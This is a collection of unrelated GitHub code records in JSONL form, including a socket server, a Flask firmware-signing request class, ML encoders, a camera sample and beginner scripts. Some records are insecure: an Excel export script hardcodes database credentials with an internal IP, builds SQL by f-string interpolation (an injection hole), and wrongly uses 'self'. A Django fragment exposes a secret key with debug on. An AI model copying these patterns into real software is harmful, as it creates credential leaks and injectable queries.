'H_ATT_RIGHT'\nBLOCK_LEFT = 'BLOCK_LEFT'\nBLOCK_RIGHT = 'BLOCK_RIGHT'\nNOTHING = 'NOTHING'\n\nACTIONS = [\n LEFT,\n RIGHT,\n UP,\n DOWN,\n NOTHING,\n ATT_RIGHT,\n ATT_LEFT,\n HEAVY_ATT_LEFT,\n HEAVY_ATT_RIGHT,\n BLOCK_LEFT,\n BLOCK_RIGHT\n]\n\n# STATS\nSTARTING_LIFE_POINT = 100\n\n#DAMAGE\nHIT_DMG = 5\nHEAVY_HIT_DMG = 10\nHEAVY_HIT_ON_BLOCK_DMG = 7\n\n","repo_name":"barder60/reinforcementFightingGame","sub_path":"constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17542881931","text":"#! -*- encoding=utf-8 -*-\nimport socket\nimport threading\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(('0.0.0.0', 8000)) # 接受一个tuple!!!!!(地址, 端口)\nserver.listen()\n\ndef handle_sock(sock, addr):\n while True:\n data = sock.recv(1024)\n data_value = data.decode(\"utf8\")\n if data_value == \"exit\":\n break\n print(data.decode(\"utf8\"))\n re_data = input()\n sock.send(re_data.encode(\"utf8\"))\n sock.close()\n \n# 获取从客户端发送的数据\n# 一次获取1K的数据\nwhile True:\n sock, addr = server.accept()\n # 用线程去处理新接收的连接(用户)\n client_thread = threading.Thread(target=handle_sock, args=(sock, addr)) # 传的函数名称,千万不要穿函数调用!\n client_thread.start()\n data = sock.recv(1024)\n print(data.decode(\"utf8\"))\n re_data = input()\n sock.send(re_data.encode(\"utf8\"))\n\n# data = sock.recv(1024) # 单位是字节, data 是一个bytes类型\n# print(data.decode(\"utf8\"))\n# sock.send(\"hello {}\".format(data.decode(\"utf8\")).encode(\"utf8\"))\n'''\nAF_INET: AddressFamily IPv4\nAF_INET6: AddressFamily IPv6\nSOCK_STREAM: SocketKind TCP\nSOCK_DGRAM: SocketKind UDP\n'''\n# server.close()\n# sock.close()","repo_name":"wnz27/Coding-Daily","sub_path":"content/Python_Generate/Python_socket编程/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15338155238","text":"#!/usr/bin/env python\n#\n# COMMON CLASS FOR SIGN REQUEST\n#\n\n\nfrom flask import Flask\nfrom flask_restful import Api, Resource, reqparse\nfrom flask import send_file\nfrom flask import render_template\nfrom flask import request, abort, jsonify, send_from_directory\nfrom server.app import app\n\nfrom server.app import getRootInputDir\nfrom server.app import getRootOutputDir\nfrom server.app import getRootDownloadDir\nfrom server.app import KEEP_OUTPUT_FILE\nfrom server.fota.fotagenresp import FotaGenResp\nimport os\nfrom server import applog as applog \nfrom server.applog import log\nfrom server.applog import logD\nfrom server.applog import logE\nimport shutil\nfrom server import common as common\nimport traceback\n# import fota\nimport server.login\n\nfrom server.common import DEFAULT_KEY_ID\nfrom server.common import INVALID_KEY_ID\n\nfrom server.storage import storageMgr\nfrom server import database as database\nfrom server.key.key_mng import keyMgr\nfrom server.app import DEBUG\nTAG = \"fota\"\n\n# Common fota request\nclass FotaGenReq(object):\n access_token = \"\" # for log in feature\n model = \"\"\n project = \"\"\n zip_output = False # if output is zip file, instead of redirecting to download page\n\n in_working_folder = \"\" # caller's input data\n out_working_folder = \"\" # output data when doing signing\n tool_working_folder = \"\" # path to tool folder\n key_working_folder = \"\" # path to key dir\n\n file_list = {} # list of input file, dict of name () and full path\n file_path_list = {} # list of input file, dict of name () and full path\n ver_list = {} # version of each module\n zip_list = {} # file of each module is zip or not\n session = None # fota session\n key_type = None # TODO: change to use key_id, for user to select key for fota\n is_api = False # Is called via API\n key_id = INVALID_KEY_ID\n key_info = None\n def __init__(self, __request):\n # Parse request info\n self.key_type = request.form.get(common.PARAM_KEY_TYPE)\n self.project = request.form.get(common.PARAM_PROJECT)\n self.model = request.form.get(common.PARAM_MODEL)\n self.access_token = request.form.get(common.PARAM_ACCESS_TOKEN)\n \n # apis\n if common.PARAM_API in request.form:\n self.is_api = request.form.get(common.PARAM_API)\n\n # zip output\n zip = request.form.get(common.PARAM_ZIP_OUTPUT)\n\n self.zip_output = common.isZip(zip)\n\n if (DEBUG): logD(\"zip_output %s\" %(self.zip_output))\n\n # generate session\n # TODO: generate here, but push other place, so risk of duplicateion session id\n # Re-use Session Management of Sign module\n from server.sign import signfactory\n self.session = signfactory.SignFactory.getSession() # WARNING: just create session, not manage by session management yet\n\n\n # check if key id is specified\n if common.PARAM_KEY_ID in request.form:\n self.key_id = request.form.get(common.PARAM_KEY_ID)\n else:\n key_name = common.extract_form_request(request, common.PARAM_KEY_NAME)\n if key_name is not None and len(key_name) > 0: #if key name, need to match with project and model\n if key_name == common.DEFAULT_KEY_ID:\n self.key_id = key_name\n else:\n self.key_info = keyMgr().get_key_by_name(key_name, project=self.project, model=self.model)\n if (self.key_info is not None):\n self.key_id = self.key_info.id\n else:\n self.key_id = INVALID_KEY_ID\n else:\n self.key_id = DEFAULT_KEY_ID\n\n # TODO: search default key in db\n if self.key_id == DEFAULT_KEY_ID:\n self.key_info = keyMgr().get_default_key(self.project, self.model, \"fota\", \"fota\")\n if self.key_info is None:\n log(\"Not found default key, use default in tool if exists\")\n\n # make working folder for request\n import server.fota\n # input folder (i.e. uploaded file)\n self.in_working_folder = os.path.join(getRootInputDir(), self.session.uuid)\n # output folder\n self.out_working_folder = os.path.join(getRootOutputDir(), self.session.uuid)\n self.tool_working_folder = \"\"\n\n # save upload file to input fulder\n for key in request.files.keys():\n # key is module name\n\n # get list of file\n files = request.files.getlist(key)\n if (DEBUG): logD(\"file: %s has %s file\" %(key, len(files)))\n self.file_list[key] = None\n for file in files:\n # check if file info is valid\n # if not file is selected to upload, files still not null, but its info is null\n if file is not None and file.filename is not None and len(file.filename) > 0:\n if (files is not None and len(files) > 0):\n self.file_list[key] = files # list of files of module (key)\n break\n # get version of modules\n # TODO: check version\n version = request.form[\"ver_%s\" % key]\n if (version is not None):\n self.ver_list[key] = version.strip()\n else:\n self.ver_list[key] = None\n\n # upload file is zip one or not\n # TODO: handle case multiple zip file is uploaded\n zip_name = \"zip_%s\" % key\n if zip_name in request.form:\n zipbin = request.form.get(zip_name)\n else:\n zipbin = False\n \n # TODO: just initialize handling, do handle it\n # TODO: handle the case that zip is selected, but it's not zip\n if (zipbin is not None):\n if (DEBUG): logD(\"%s zip %s\" %(key, zipbin))\n self.zip_list[key] = True if zipbin == 'on' else False\n else:\n self.zip_list[key] = False\n\n def toString(self, isFull=False):\n str = \"\"\n \n if (self.session is not None):\n str += \"session: %s, \" % self.session.toString()\n if (isFull):\n if (self.model is not None):\n str += \"model: %s, \" % self.model\n if (self.access_token is not None):\n str += \"access_token: %s, \" % self.access_token\n if (self.in_working_folder is not None):\n str += \"in_working_folder: %s, \" % self.in_working_folder\n if (self.out_working_folder is not None):\n str += \"out_working_folder: %s, \" % self.out_working_folder\n if (self.ver_list is not None):\n str += \"ver_list: %s, \" % self.ver_list\n\n str += \"\\n\"\n return str\n\n # clean up fota request data\n def clean(self):\n if (DEBUG): logD(\"SignRequest: remove in_working_folder %s\" % self.in_working_folder)\n common.rmdirs(self.in_working_folder)\n if (DEBUG): logD(\"SignRequest: remove out_working_folder %s\" % self.out_working_folder)\n common.rmdirs(self.out_working_folder)\n #download folder will be clean in SignResp\n","repo_name":"dutroctu/sign_server","sub_path":"server/fota/fotagenreq.py","file_name":"fotagenreq.py","file_ext":"py","file_size_in_byte":7192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2631598787","text":"#write a python script to concatenate following dictionaries to create a new one\n\nprint(\"****************************************************\")\nprint(\"Program to concatenate given dictionaries in new one\")\nprint(\"****************************************************\\n\")\n\nd1 = dict() #empty list\nnum = int(input(\"How many key-value pairs do you wish to enter for season-1: \"))\n\n#loop\nfor i in range(num):\n data = input(\"Enter player name and goals seperated by ':' - \")\n tempInput = data.split(':')\n d1[tempInput[0]] = int(tempInput[1])\n\nd2 = dict() #empty list\nnum2 = int(input(\"\\nHow many key-value pairs do you wish to enter for season-2: \"))\n\n#loop\nfor j in range(num2):\n data2 = input(\"Enter player name and goals seperated by ':' - \")\n tempInput2 = data2.split(':')\n d2[tempInput2[0]] = int(tempInput2[1])\n\n#concatenation\nprint(\"\\nSeason-1 Scores :\", d1)\nprint(\"\\nSeason-2 Scores :\", d2)\n\ntempDict = d1.copy()\ntempDict.update(d2)\n\nprint(\"\\nAll scores :\", tempDict)","repo_name":"soulspy23/CLASSROOM_1","sub_path":"SEM 3/PRACTICALS/p5/p5_b.py","file_name":"p5_b.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"74812331356","text":"import numpy as np\r\nimport cv2\r\n\r\nimg = cv2.imread('lena.bmp', cv2.IMREAD_GRAYSCALE)\r\nimg_height = img.shape[0]\r\nimg_width = img.shape[1]\r\n\r\ntiny_img_height = int(img_height/8)\r\ntiny_img_width = int(img_width/8)\r\ntiny_binimg = np.zeros((tiny_img_height, tiny_img_width), dtype = np.uint8)\r\n\r\nfor i in range(tiny_img_height):\r\n for j in range(tiny_img_width):\r\n if (img[8*i, 8*j] < 128):\r\n tiny_binimg[i, j] = 0\r\n else:\r\n tiny_binimg[i, j] = 255\r\n\r\nresult = np.zeros((tiny_img_height, tiny_img_width), dtype=np.uint8)\r\n\r\ndef h(a1, a2, a3, a4):\r\n if a1 != a2:\r\n return 's'\r\n elif a1 == a3 == a4:\r\n return 'r'\r\n else: \r\n return 'q'\r\n\r\ndef f(h1, h2, h3, h4):\r\n if (h1 == h2 == h3 == h4 == 'r'):\r\n return 5\r\n else:\r\n return ((h1 == 'q') + (h2 == 'q') + (h3 == 'q') + (h4 == 'q'))\r\n\r\n######################\r\n# x[7] # x[2] # x[6] #\r\n# x[3] # x[0] # x[1] #\r\n# x[8] # x[4] # x[5] #\r\n######################\r\n\r\nfor i in range(tiny_img_height):\r\n for j in range(tiny_img_width):\r\n x = np.zeros((9), dtype = np.uint8)\r\n x[0] = tiny_binimg[i, j]\r\n if (j+1 >= tiny_img_width):\r\n x[1] = 0\r\n else:\r\n x[1] = tiny_binimg[i, j+1]\r\n if (i-1 < 0):\r\n x[2] = 0\r\n else:\r\n x[2] = tiny_binimg[i-1, j]\r\n if (j-1 < 0):\r\n x[3] = 0\r\n else:\r\n x[3] = tiny_binimg[i, j-1]\r\n if (i+1 >= tiny_img_height):\r\n x[4] = 0\r\n else:\r\n x[4] = tiny_binimg[i+1, j]\r\n if (i+1 >= tiny_img_height or j+1 >= tiny_img_width):\r\n x[5] = 0\r\n else:\r\n x[5] = tiny_binimg[i+1, j+1]\r\n if (i-1 < 0 or j+1 >= tiny_img_width):\r\n x[6] = 0\r\n else:\r\n x[6] = tiny_binimg[i-1, j+1]\r\n if (i-1 < 0 or j-1 < 0):\r\n x[7] = 0\r\n else:\r\n x[7] = tiny_binimg[i-1, j-1]\r\n if (i+1 >= tiny_img_height or j-1 < 0):\r\n x[8] = 0\r\n else:\r\n x[8] = tiny_binimg[i+1, j-1]\r\n if (tiny_binimg[i, j] == 0):\r\n result[i, j] = 0\r\n else:\r\n result[i,j] = f(h(x[0], x[1], x[6], x[2]), \\\r\n h(x[0], x[2], x[7], x[3]), \\\r\n h(x[0], x[3], x[8], x[4]), \\\r\n h(x[0], x[4], x[5], x[1]))\r\n\r\noutput_log = open(\"lena_yokoi.txt\", 'w')\r\nfor i in range(tiny_img_height):\r\n for j in range(tiny_img_width):\r\n if (result[i, j] == 0):\r\n print(\" \", end = \" \", file = output_log)\r\n else:\r\n print(result[i, j], end = \" \", file = output_log)\r\n print(file = output_log)","repo_name":"neil1373/CV2019","sub_path":"hw6/hw6.py","file_name":"hw6.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25745533996","text":"from enum import Enum\nimport os\n\nDATASETS = {\n 'e_coli': os.path.abspath('inputs/E_coli_genome.txt'),\n 'salmonella': os.path.abspath('inputs/Salmonella_enterica.txt'),\n 'cholera': os.path.abspath('inputs/Vibrio_Cholera_Genome.txt'),\n 'tb_dosr': os.path.abspath('inputs/DosR.txt'),\n}\nDATASET_KEYS = list(DATASETS.keys())\n\nBASES = ['A','C','G','T']\nBASES_COMPLEMENTS = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}\n\nclass Plots(Enum):\n COUNTS_RAW = 'Counts'\n COUNTS_PCT = 'Counts (%)'\n COUNTS_PCT_BASE = 'Counts Centered (%)'\n COUNTS_PCT_DIFF = 'Counts Diff(%)'\n SKEW = 'Skew'\n TEST = 'Test'\n NETWORK = 'Network'\n\nENABLED_PLOTS = [Plots.COUNTS_PCT_BASE, Plots.COUNTS_PCT_DIFF, Plots.SKEW, Plots.NETWORK]\n\ndef dataset(key):\n if key not in DATASET_KEYS:\n raise Exception(f\"invalid key {key}\")\n if key == 'tb_dosr':\n with open(DATASETS[key]) as f: return [l.strip() for l in f.readlines()]\n with open(DATASETS[key]) as f: return f.read().strip().replace('\\n','')","repo_name":"ankitson/compbio","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73456503836","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass TwoLayerCNN(nn.Module): # for Rotate MNIST, follows the PyTorch example on MNIST\n def __init__(self):\n super(TwoLayerCNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.bn2 = nn.BatchNorm2d(64)\n self.dropout1 = nn.Dropout(0.25)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = self.bn2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n\n return x\n\n\nclass ThreeLayerCNN(nn.Module): # for portraits\n def __init__(self):\n super(ThreeLayerCNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.bn2 = nn.BatchNorm2d(64)\n self.conv3 = nn.Conv2d(64, 128, 3, 1)\n self.bn3 = nn.BatchNorm2d(128)\n self.dropout1 = nn.Dropout(0.5)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.conv2(x)\n x = self.bn2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.conv3(x)\n x = self.bn3(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 4)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n\n return x\n\nclass OneLayerMLPEnc(nn.Module):\n def __init__(self, input_dim, output_dim, dropout_p=0.25):\n super(OneLayerMLPEnc, self).__init__()\n self.fc = nn.Linear(input_dim, output_dim)\n self.bn1 = nn.BatchNorm1d(output_dim)\n self.dropout = nn.Dropout(dropout_p)\n\n def forward(self, x):\n x = self.fc(x)\n x = self.bn1(x)\n x = self.dropout(x)\n return x","repo_name":"hsinghuan/gde","sub_path":"model/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14269515140","text":"\"\"\"\n\tPixelFormat: Set output pixel format to Mono8.\n\n\"\"\"\n\nimport stapipy as st\n\nnumber_of_images_to_grab = 100\n\ntry:\n st.initialize()\n\n st_system = st.create_system()\n\n st_device = st_system.create_first_device()\n\n print('Device=', st_device.info.display_name)\n\n # ============================================================\n # Demostration of PixelFormat change.\n\n # Acquire NodeMap for accessing camera parameter\n nodemap_remote = st_device.remote_port.nodemap\n\n # Set Pixel Format to Mono8.\n pixel_format = nodemap_remote.get_node(\"PixelFormat\")\n enum_pixel_format = st.PyIEnumeration(pixel_format)\n enum_pixel_format.from_string(\"Mono8\")\n \n # ============================================================\n\n st_datastream = st_device.create_datastream()\n\n st_datastream.start_acquisition(number_of_images_to_grab)\n\n st_device.acquisition_start()\n\n while st_datastream.is_grabbing:\n with st_datastream.retrieve_buffer() as st_buffer:\n if st_buffer.info.is_image_present:\n st_image = st_buffer.get_image()\n print(\"BlockID={0} Size={1} x {2} First Byte={3}\".format(\n st_buffer.info.frame_id,\n st_image.width, st_image.height,\n st_image.get_image_data()[0]))\n else:\n print(\"Image data does not exist.\")\n\n st_device.acquisition_stop()\n\n st_datastream.stop_acquisition()\n\nexcept Exception as exception:\n print(exception)\n","repo_name":"Setsu00/SentechSDK_FunctionSample","sub_path":"Python/Parameter_PixelFormat/grab_Parameter_PixelFormat.py","file_name":"grab_Parameter_PixelFormat.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"15504510320","text":"import sys\nsys.path.append('../../')\nsys.path.append('../../layer')\n\nimport os\nimport json\nimport unittest\nfrom unittest import mock\n\n# wip\n# No such file or directory: 'template.html'\n\nwith mock.patch.dict('os.environ', {'AWS_REGION': 'us-east-1', 'TABLE_NAME': 'mock-table', 'ANNOUNCEMENTS_BUCKET': 'mock-bucket', 'CONTACT_TABLE_NAME': 'mock-contact-table'}):\n from send_daily_email.app import lambda_handler\n\ndef mocked_get_announcement():\n return None\n\ndef mocked_store_words(word_list):\n return\n\ndef mocked_send_email(campaign_contents, email):\n\n ses_success_response = {\n \"MessageId\":\"010001731670746b-123456-6e8c-4bd0-bf32-4238ba0e5921-000000\",\n \"ResponseMetadata\":{\n \"RequestId\":\"ab476c36-de5a-123a-a90e-6be7b103b68f\",\n \"HTTPStatusCode\":200,\n \"HTTPHeaders\":{\n \"x-amzn-requestid\":\"ab476c36-de5a-123a-a90e-6be7b103b68f\",\n \"content-type\":\"text/xml\",\n \"content-length\":\"326\",\n \"date\":\"Fri, 03 Jul 2020 20:48:54 GMT\"\n },\n \"RetryAttempts\":0\n }\n }\n\n return ses_success_response\n\ndef mocked_scan_contacts():\n\n all_contacts = [\n {'Date': '2020-01-13', 'CharacterSet': 'simplified', 'Status': 'subscribed', 'SubscriberEmail': 'user@example.com', 'ListId': '1'},\n {'Date': '2020-01-13', 'CharacterSet': 'simplified', 'Status': 'unsubscribed', 'SubscriberEmail': 'user@example.com', 'ListId': '6'},\n {'Date': '2020-01-13', 'CharacterSet': 'traditional', 'Status': 'subscribed', 'SubscriberEmail': 'user@example.com', 'ListId': '4'},\n {'Date': '2020-01-13', 'CharacterSet': 'traditional', 'Status': 'unsubscribed', 'SubscriberEmail': 'user@example.com', 'ListId': '3'}\n ]\n\n return all_contacts\n\ndef mocked_get_random(hsk_level):\n \n hsk_level_index = int(hsk_level) - 1\n\n local_vocab_lists = [\n {\n \"Word\": \"怎么样\",\n \"Pronunciation\": \"zěn me yàng\",\n \"Definition\": \"how?; how about?; how was it?; how are things?\",\n \"HSK Level\": \"1\",\n \"Word-Traditional\": \"怎麼樣\"\n },\n {\n \"Word\": \"回答\",\n \"Pronunciation\": \"huí dá\",\n \"Definition\": \"to reply; to answer; the answer; CL:個|个[ge4]\",\n \"HSK Level\": \"2\",\n \"Word-Traditional\": \"回答\"\n },\n {\n \"Word\": \"腿\",\n \"Pronunciation\": \"tuǐ\",\n \"Definition\": \"leg; CL:條|条[tiao2]\",\n \"HSK Level\": \"3\",\n \"Word-Traditional\": \"腿\"\n },\n {\n \"Word\": \"乱\",\n \"Pronunciation\": \"luàn\",\n \"Definition\": \"in confusion or disorder; in a confused state of mind; disorder; upheaval; riot; illicit sexual relations; to throw into disorder; to mix up; indiscriminate; random; arbitrary\",\n \"HSK Level\": \"4\",\n \"Word-Traditional\": \"亂\"\n },\n {\n \"Word\": \"叉子\",\n \"Pronunciation\": \"chā zi\",\n \"Definition\": \"fork; CL:把[ba3]\",\n \"HSK Level\": \"5\",\n \"Word-Traditional\": \"叉子\"\n },\n {\n \"Word\": \"注视\",\n \"Pronunciation\": \"zhù shì\",\n \"Definition\": \"to watch attentively; to gaze\",\n \"HSK Level\": \"6\",\n \"Word-Traditional\": \"注視\"\n }\n ]\n\n return local_vocab_lists[hsk_level_index]\n\nclass SendDailyEmailTest(unittest.TestCase):\n\n @mock.patch('send_daily_email.app.get_announcement', side_effect=mocked_get_announcement)\n @mock.patch('send_daily_email.app.scan_contacts_table', side_effect=mocked_scan_contacts)\n @mock.patch('send_daily_email.app.select_random_word', side_effect=mocked_get_random)\n @mock.patch('send_daily_email.app.send_email', side_effect=mocked_send_email)\n def test_build(self, send_email_mock, get_random_mock, scan_contacts_mock, get_announcement_mock):\n\n response = lambda_handler(self.scheduled_event(), \"\")\n\n self.assertEqual(get_announcement_mock.call_count, 1)\n self.assertEqual(scan_contacts_mock.call_count, 1)\n self.assertEqual(get_random_mock.call_count, 6)\n self.assertEqual(send_email_mock.call_count, 2)\n\n def scheduled_event(self):\n return {\n \"version\": \"0\",\n \"id\": \"d77bcbc4-0b2b-4d45-9694-b1df99175cfb\",\n \"detail-type\": \"Scheduled Event\",\n \"source\": \"aws.events\",\n \"account\": \"123456789\",\n \"time\": \"2016-09-25T04:55:26Z\",\n \"region\": \"us-east-1\",\n \"resources\": [\n \"arn:aws:events:us-east-1:123456789:rule/test-scheduled-event\"\n ],\n \"detail\": {}\n }\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"kbsujit/vocab","sub_path":"src/tests/unit/test_send_daily_email.py","file_name":"test_send_daily_email.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"42931239100","text":"import logging\n\nimport lobby_service_common as service\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef lambda_handler(event, context):\n lobby_info = service.get_event_body(event)\n\n lobby_name = lobby_info[service.LOBBY_NAME]\n host_player = lobby_info[service.HOST_PLAYER]\n map_id = lobby_info[service.MAP_ID]\n num_players = lobby_info[service.NUM_PLAYERS]\n is_public = lobby_info[service.IS_PUBLIC]\n lobby_id = service.get_lobby_uuid()\n creation_time = service.get_unix_time()\n players = [host_player]\n map_name = service.get_map_name(map_id)\n\n logger.info(\"Received request to create Lobby: \" + lobby_id + \" - \" + lobby_name + \" by \" + str(host_player))\n\n lobby_item = {service.LOBBY_ID: lobby_id,\n service.LOBBY_NAME: lobby_name,\n service.MAP_ID: map_id,\n service.MAP_NAME: map_name,\n service.CREATION_TIME: creation_time,\n service.PLAYERS: players,\n service.NUM_PLAYERS: num_players,\n service.IS_PUBLIC: is_public,\n service.GAME_ID: service.GAME_ID_DEFAULT}\n\n service.create_lobby(lobby_item)\n\n return service.get_response(lobby_id)\n","repo_name":"Devin0xFFFFFF/singed-feathers","sub_path":"LobbyService/service/create_lobby.py","file_name":"create_lobby.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"72792439516","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport pandas as pd\nimport io\nfrom xlsxwriter import Workbook\nfrom sqlalchemy import create_engine\nfrom datetime import datetime\n\n\n\n\nPOSTGRES_ADDRESS = '172.20.195.13' #'db.panoply.io' ## INSERT YOUR DB ADDRESS IF IT'S NOT ON PANOPLY\nPOSTGRES_PORT = '5432'\nPOSTGRES_USERNAME = 'tableau' #'username' ## CHANGE THIS TO YOUR PANOPLY/POSTGRES USERNAME\nPOSTGRES_PASSWORD = 'qwert123' #'***' ## CHANGE THIS TO YOUR PANOPLY/POSTGRES PASSWORD \nPOSTGRES_DBNAME = 'tollfreedb' # CHANGE THIS TO YOUR DATABASE NAME\n# A long string that contains the necessary Postgres login information\npostgres_str = ('postgresql://{username}:{password}@{ipaddress}:{port}/{dbname}'\n .format(username=POSTGRES_USERNAME,\n password=POSTGRES_PASSWORD,\n ipaddress=POSTGRES_ADDRESS,\n port=POSTGRES_PORT,\n dbname=POSTGRES_DBNAME))\n# Create the connection\ncnx = create_engine(postgres_str)\n\n\n\n\ndef exportdata(table_type, tollfree, startdate, enddate, username):\n queryEAS = f'''Select tollfree, \n state, \n area, \n complete,\n duration, \n 'cost',\n busy,\n no_answer,\n other,\n incomplete\n From callsummary as c \n where c.tollfree = {tollfree} and c.call_date >= {startdate} and c.call_date <= {enddate};\n '''\n \n output = io.BytesIO()\n \n ###################### EXCHANGE AREA SUMMARY-OVERALL ########################\n if table_type == 'EAS':\n df = pd.read_sql_query(queryEAS, cnx)\n dataEAS = df.groupby(['state','area']).agg(\n Complete_Calls = pd.NamedAgg(column='complete',aggfunc=sum),\n Total_Call_Duration = pd.NamedAgg(column='duration',aggfunc=sum),\n Total_Cost_of_Calls = pd.NamedAgg(column='cost',aggfunc=sum),\n Busy_Calls = pd.NamedAgg(column='busy',aggfunc=sum),\n No_Answer = pd.NamedAgg(column='no_answer',aggfunc=sum),\n Other = pd.NamedAgg(column='other',aggfunc=sum),\n Total_Incomplete = pd.NamedAgg(column='incomplete',aggfunc=sum),\n ).reset_index()\n\n dataEAS['%_Incomplete'] = (dataEAS['Total_Incomplete']/(dataEAS['Complete_Calls'] + dataEAS['Total_Incomplete']))* 100\n dataEAS['%_Incomplete'] = dataEAS['%_Incomplete'].round(2)\n\n dataEAS['Ave_Call_Length'] = dataEAS['Total_Call_Duration']/dataEAS['Complete_Calls']\n\n dataEAS['Average_Call_Length'] = pd.to_datetime(dataEAS['Ave_Call_Length'], unit='s')\n dataEAS['Average_Call_Length'] = dataEAS['Average_Call_Length'].dt.strftime('%H:%M:%S')\n dataEAS['Call_Duration'] = pd.to_datetime(dataEAS['Total_Call_Duration'], unit='s')\n dataEAS['Call_Duration'] = dataEAS['Call_Duration'].dt.strftime('%H:%M:%S')\n\n\n data = dataEAS[['state','area','Complete_Calls','Call_Duration','Average_Call_Length',\n 'Total_Cost_of_Calls','Busy_Calls','No_Answer','Other','Total_Incomplete','%_Incomplete']]\n \n data.rename({'state':'State', 'area':'Exchange Areas', 'Complete_Calls':'Calls', 'Call_Duration':'Duration', \n 'Average_Call_Length':'Avg Duration', 'Total_Cost_of_Calls':'Costs', 'Busy_Calls':'Busy', \n 'No_Answer':'No Answer', 'Total_Incomplete':'Incomplete','%_Incomplete':'Incomplete Percentage'},\n inplace=True)\n\n elif table_type == 'xxx':\n pass\n \n \n \n options = {'default_date_format': 'dd/mm/yy', \n 'remove_timezone': True,\n 'in_memory': True} # in_memory to set true to disable writing temp file.\n\n \n file = Workbook(output,options)\n # text and formating\n bold_blue_16 = file.add_format({'bold':True, 'font_color':'blue','font_size':16}) # for color can also use rgb codes eg darkblue '#000066'\n normal_bold = file.add_format({'bold':True})\n normal_text = file.add_format({'bold':False})\n coloured_cell_bold = file.add_format({'bold':True,'bg_color':'blue','font_color':'white','bottom':1})\n blue_color = file.add_format({'bold':True,'bg_color':'#0072ce','font_color':'white'})\n date_format = file.add_format({'num_format': 'dddd, mmmm dd, yyyy'})\n \n # create sheet\n worksheet = file.add_worksheet() # can also specify name for sheet # Workbook.add_worksheet('Top 5 call')\n # g column for infos cause nice if print a4 just fit a4 size\n # all writing data operation is done on worksheet\n # worksheet.merge_range(\n # 'A1:C5',\n # 'Merged Cells'\n # )\n image_options = {\n 'x_scale':0.7,\n 'y_scale':0.7,\n \"object_position\":1,\n #\"url\":'http://example.com', # make image clickable to open webpage\n 'decorative':False\n }\n end_column = len(data.columns) - 1\n worksheet.insert_image('A2','TM Logo.png',image_options)\n worksheet.write_datetime(2, end_column, datetime.today(), date_format)\n worksheet.write_string(3, end_column, 'Test User', normal_bold)\n worksheet.write_string(4, end_column, tollfree,normal_bold)\n worksheet.write_string(5, end_column, startdate +' to '+ enddate, normal_bold)\n worksheet.write_string(6, end_column, table_type ,normal_text)\n\n # set column widht\n # worksheet.set_column('G:G',30) # widht in char units (bilangan huruf)\n\n # write column names\n for i, col in enumerate(data):\n worksheet.set_column(i,i,15)\n worksheet.write_string(7,i, col, blue_color) # row,column,data, format\n for j, item in enumerate(data[col]):\n if col == 'dduration':\n worksheet.write_string(8+j,i,str(item))\n else:\n worksheet.write(8+j,i,item) # row,column,data,format\n worksheet.set_column(end_column,end_column,len(startdate +' to '+ enddate))\n\n # close to save\n file.close()\n\n output.seek(0)\n \n # django response\n self.send_response(200)\n self.send_header('Content-Disposition', 'attachment; filename=test.xlsx')\n self.send_header('Content-type',\n 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n self.end_headers()\n self.wfile.write(output.read())\n return\n\n\n\n\n\n\n","repo_name":"govind-raj99/2U2I","sub_path":"django/core/templates/Adhoc_Excel_Reports.py","file_name":"Adhoc_Excel_Reports.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74627681756","text":"import os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nSECRET_KEY = 'ahjd9sddteijcfhp_&96w80k-s*0=uuq80th_p!u7qv9+y9tkw'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n# Static, 